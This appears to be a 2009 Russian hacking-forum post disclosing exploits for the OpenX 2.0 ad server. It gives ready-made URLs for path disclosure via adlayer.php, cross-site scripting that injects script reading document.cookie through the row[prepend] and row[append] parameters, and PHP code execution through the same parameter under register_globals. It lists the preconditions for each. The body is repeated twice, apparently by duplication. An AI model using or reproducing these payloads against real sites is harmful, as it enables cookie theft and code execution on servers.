(Dm)
20.09.2009, 01:10
Это последняя версия движка в ветке OpenX 2.0.
Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел...
>> Раскрытие пути:
условия:
+ display_errors = On
сплоит: http://openads/adlayer.php?layerstyle=antichat
>> XSS
условия:
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера
>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера
Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел...
>> Раскрытие пути:
условия:
+ display_errors = On
сплоит: http://openads/adlayer.php?layerstyle=antichat
>> XSS
условия:
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера
>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера